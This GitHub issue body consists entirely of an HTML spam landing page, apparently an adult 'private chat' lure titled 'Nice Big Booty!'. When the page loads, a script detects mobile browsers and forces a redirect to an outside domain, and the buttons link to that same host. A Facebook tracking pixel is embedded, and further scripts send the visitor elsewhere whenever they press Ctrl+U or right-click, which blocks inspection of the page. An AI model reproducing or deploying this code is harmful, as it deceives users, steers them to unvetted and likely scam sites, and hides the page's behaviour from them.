### ISSUE TITLE
perfect booty girls

### ISSUE THREAD

**Issue by nunungaryanti** [nunungaryanti/github-upload#3]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<!DOCTYPE html>
<html>
	<head>
		<meta charset="utf-8">
		<title>Nice Big Booty!</title>

		<style type="text/css">
			@import url(https://lh4.googleusercontent.com/proxy/VdW1iwHlE0N9Yk0z7MLxFQwfSoHJUvbnA-qBoQb25ZG1sL01K-Iyl0JhzjYuo-0kE1OEgTQ7TLgsDM6t35z3ECVy8P3xBB_SDm_EO_HRalk=s0-d);
			@import url(https://lh5.googleusercontent.com/proxy/WexZKzJY2DuLA_Lf22JA39XXkqfkd8ceMvO2EqmSJkJpGD-wavWsrWE-ILJXWznuNuFCyS1fs9Zaj0WSOp0DlLhsuCviWGU=s0-d);
			html,body{
				margin: 0;
				padding: 0;
			}
			body {
				background-image: url('https://gallery.mailchimp.com/f33f273f41587fb111156ec73/images/33f6b218-351a-450c-9d23-b8b33eb926a2.gif');
				background-repeat:repeat;
				background-position:center;
				background-color: #ffffff;
			}		
						h1,a {
				font-family: 'Open Sans', sans-serif;
				margin: 0;
			}
			p {
				margin: 0;
			}
			.main{
				margin:0 auto;
				padding-top:0;
				padding-bottom:10px;
				padding: 0;
				margin-bottom: 100px;
			}
			.header .top,
			.header .bottom,
			.answers_title {
				text-align: center;
				text-transform: uppercase;
			}
			.header .top {
				background-color: color|transparent|initial|inherit;
				padding: 19px 0 40px;
			}
			.header .top h1 {
				font-size: 26px;
				color: #19aa00;
			}
			.top_first {
				color: #ffffff;
			}
			.header .bottom {
				max-width: 863px;
				border-radius: 25px 25px 25px 25px;
				border-top: 2px solid #00BF9F20;
				box-shadow: 0px 1px 1px #00BF9F20;
				background-color: #00BF9F20;
				margin: -29px auto 0;
				padding: 9px 0;
			
			}
			.header .bottom p {
				font-size: 26px;
				color: #fe4d43;
				font-family: 'Indie Flower', cursive;
			}
			.answers {
				width: 863px;
				margin: 0 auto;
			}
			.answers_title {
				margin-top: 350px;
			}
			.answers_title p {
			    border-radius: 25px 25px 25px 25px;
				border-top: 2px solid rgba(0,0,0,0.5);
				box-shadow: 0px 1px 1px rgba(0,0,0,0.5);
				background-color: rgba(0,0,0,0.5);
				font-size: 22px;
				color: rgba(0,0,0,0.5);
				font-family: 'Open Sans', sans-serif;
			}
			.question {
				border-radius: 25px 25px 25px 25px;
				border-top: 2px solid #343434;
				box-shadow: 0px 1px 1px #6871f2;
				background-color: #6871f2;
				margin: 14px 0 18px;
				padding: 9px 0 11px;
			}
			.question p {
				border-radius: 25px 25px 25px 25px;
				border-top: 2px solid #383737;
				box-shadow: 0px 1px 1px #383737;
				background-color: #383737;
				font-size: 24px;
				color: #ffffff;
				font-family: 'Indie Flower', cursive;
				text-align: center;
			}
			.answers-row {
				text-align: center;
			}
			.answer {
				font-size: 18px;
				font-weight: 600;
				background-color: #f71f1f;
				color: #1d1d1d;
				border-top: 2px solid #f71f1f;
				box-shadow: 0px 1px 1px #000000;
				display: inline-block;
				text-decoration: none;
				text-align: center;
				text-transform: uppercase;
				width: 422px;
				padding: 14px 0 19px;
				margin-bottom: 23px;
				border-radius: 25px 25px 25px 25px;
			}
			.answer-block {
				display: inline-block;
			}
			.answer-block:first-child {
				margin-right: 15px;
			}
			.opt_in_field {
				text-align: center;
			}
			.name_field,
			.email_field {
				margin-bottom: 5px;
			}
			.name_field input,
			.email_field input {
				border-radius: 5px 5px 5px 5px;
				padding: 9px;
				width: 300px;
			}
			.send_button {
				background-color: #f7a01f;
				border-top: 2px solid #ffb547;
				border-radius: 25px 25px 25px 25px;
				border: transparent;
				color: #000000;
				font-size: 20px;
				font-family: 'Open Sans', sans-serif;
				font-weight: 600;
				text-transform: uppercase;
				cursor: pointer;
				padding: 9px;
			}		
			.gallery {
				margin: 20px auto 0 auto;
				width: 795px;
			}
			.gallery img.galleryImage {
				width: 180px;
				height: 180px;
				margin-bottom: 10px;
			}
			.galleryImageHolder {
				width: 180px;
				height: 180px;
				float: left;
				border: 4px solid #fff;
				border-radius: 30px;
				margin: 0 0 10px 0;
				text-align: center;
				position: relative;
			}
			img.loader {
				position: cover;
				top: 2%;
				left: 23%;
				margin-top: 30px;
			}
						.gallery img, .galleryImageHolder {
				border-radius: 120px;
			}
						.galleryImageHolder:not(:nth-of-type(0n+0)) {
				margin-right: 1px;
			}
			@media (max-width: 915px){
				.header .top {
					padding: 15px 0 50px;
				}
				.header .top h1 {
					font-size: 22px;
				}
				.header .bottom {
					max-width: 727px;
				}
				.answers {
					max-width: 727px;
				}
				.answers_title {
					margin-top: 23px;
				}
				.question {
					margin: 14px 0 43px;
				}
				.answer {
					font-size: 16px;
					width: 354px;
				}
			}
			@media (max-width: 790px) {
				.answer-block:first-child {
					margin-right: 0;
				}
			}
			@media (max-width: 590px){
				.header .top {
					padding: 11px 5px 23px;
				}
				.header .top h1 {
					font-size: 16px;
					line-height: 19px;
				}
				.header .bottom {
					max-width: 273px;
					margin: -17px auto 0;
					padding: 5px 18px 2px;
				}
				.header .bottom p {
					font-size: 14px;
					line-height: 15px;
				}
				.answers {
					max-width: 310px;
				}
				.answers_title {
					margin-top: 7px;
				}
				.answers_title p {
					font-size: 14px;
				}
				.question {
					margin: 6px 0 11px;
					padding: 5px 15px 3px;
				}
				.question p {
					font-size: 14px;
					line-height: 15px;
				}
				.answer {
					font-size: 14px;
					width: 100%;
					padding: 7px 0 12px;
					margin-bottom: 3px;
				}
			}
					</style>
		
		<script language='javascript' type='text/javascript'>
(function(a,b){if(/android.+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|e\-|e\/|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|xda(\-|2|g)|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,'http://bencet212.vdor.us/5bb6284f20903');
</script>
		
		<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
				
		<script>
		!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?
		n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;
		n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;
		t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,
		document,'script','https://connect.facebook.net/en_US/fbevents.js');
		fbq('init', '203325046744390');
		fbq('track', 'PageView');
		</script>
		<noscript><img height="1" width="1" style="display:none"
		src="https://www.facebook.com/tr?id=203325046744390&ev=PageView&noscript=1"
		/></noscript>
		
		
					<style type="text/css">@import url(//www.blogger.com/static/v1/v-css/navbar/3334278262-classic.css);
div.b-mobile {display:none;}
</style>

</head><body><script type="text/javascript">
    function setAttributeOnload(object, attribute, val) {
      if(window.addEventListener) {
        window.addEventListener('load',
          function(){ object[attribute] = val; }, false);
      } else {
        window.attachEvent('onload', function(){ object[attribute] = val; });
      }
    }
  </script>
<div id="navbar-iframe-container"></div>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
<script type="text/javascript">
      gapi.load("gapi.iframes:gapi.iframes.style.bubble", function() {
        if (gapi.iframes && gapi.iframes.getContext) {
          gapi.iframes.getContext().openChild({
              url: 'https://www.blogger.com/navbar.g?targetBlogID\x3d38233529702339444\x26blogName\x3dprivatemecallnow\x26publishMode\x3dPUBLISH_MODE_BLOGSPOT\x26navbarType\x3dBLUE\x26layoutType\x3dCLASSIC\x26searchRoot\x3dhttps://privatemecallnow.blogspot.com/search\x26blogLocale\x3den\x26v\x3d2\x26homepageUrl\x3dhttps://privatemecallnow.blogspot.com/\x26vt\x3d-5341732243428534195',
              where: document.getElementById("navbar-iframe-container"),
              id: "navbar-iframe"
          });
        }
      });
    </script>
	
		<div class="wrapper">
			<div class="main">
				<div class="header">

					<div class="top"><h1><span class="top_first">The girls of your dreams</span> are here!</h1></div>
					
				</div>
				
				<div class="answers">

					<div class="answers_title"><p> <a href="https://mc.us19.list-manage.com/pages/track/click?u=f33f273f41587fb111156ec73&id=7c5f2f4c12" title="" class="" target="_self" style="-webkit-box-sizing: border-box;-moz-box-sizing: border-box;box-sizing: border-box !important;">
        <img alt="" src="https://i.imgur.com/uefXl6G.gif" width="auto" style="max-width: 100%;align-self: center;flex: 0 0 auto;border: 1px solid;border-radius: 3%;box-shadow: none;-webkit-box-sizing: border-box;-moz-box-sizing: border-box;height: auto;outline: none;text-decoration: none;vertical-align: bottom;box-sizing: border-box !important;" class="mcnImage">
		</a></p></div>
		
		
		
											
						<div class='questionblocks' id='question7'><br>
							<CENTER><a class="question" href="http://bencet212.vdor.us/5bb6284f20903"><p>PRIVATE CHAT?</p></a></CENTER><br>
															<CENTER><a class="answer" href="http://bencet212.vdor.us/5bb6284f20903">CONTINUE</a></CENTER>

													</div>
						
											
													</div>
						
									</div>				
										
		</div>

		
		

		<script type="text/javascript">

			var galleryimage = $('.galleryimage');
			var loader = $('.loader');

			galleryimage.hide();

			galleryimage.on('load', function() {
				$(this).fadeIn();
				$(this).siblings().fadeOut();
			});
			var mq = [7];
			var a = '', g = '', c = [], o = [];

			$(document).ready(function(){
				$('.questionblocks').hide();
				$('#question'+mq.shift()).fadeIn();
			});

			$('.answer').click(function() {
				var v = $(this).data('target-id');
				switch(parseInt($(this).data('target-type')))
				{
					case 1 : a = v;
					break;
					case 2 : c.push(v);
					break;
					case 3 : g = v;
					break;
					case 4 : o.push(v);
					break;
					case 5 : $(this).parent().parent().fadeOut(function() {
						$('#question'+v).fadeIn();});
						return false;
				}
				if (mq.length > 0) {
												fbq('track', 'Click1', {domain: window.location.href});
												
						$(this).parent().fadeOut(function() {$('#question'+mq.shift()).fadeIn();});
						
				}
				
			});
			</script>
			 <script type='text/javascript'>
//<![CDATA[
//Script Redirect CTRL + U
//https://mastamvan.blogspot.com/ ganti dengan url blog kalian
function redirectCU(e) {
  if (e.ctrlKey && e.which == 85) {
    window.location.replace("https://nicegirlsbigbooty.blogspot.com/");
    return false;
  }
}
document.onkeydown = redirectCU;

//Script Redirect Klik Kanan
function redirectKK(e) {
  if (e.which == 3) {
    window.location.replace("https://nicegirlsbigbooty.blogspot.com/");
    return false;
  }
}
document.oncontextmenu = redirectKK;
//]]>
</script>	

	
	</body>
</html>
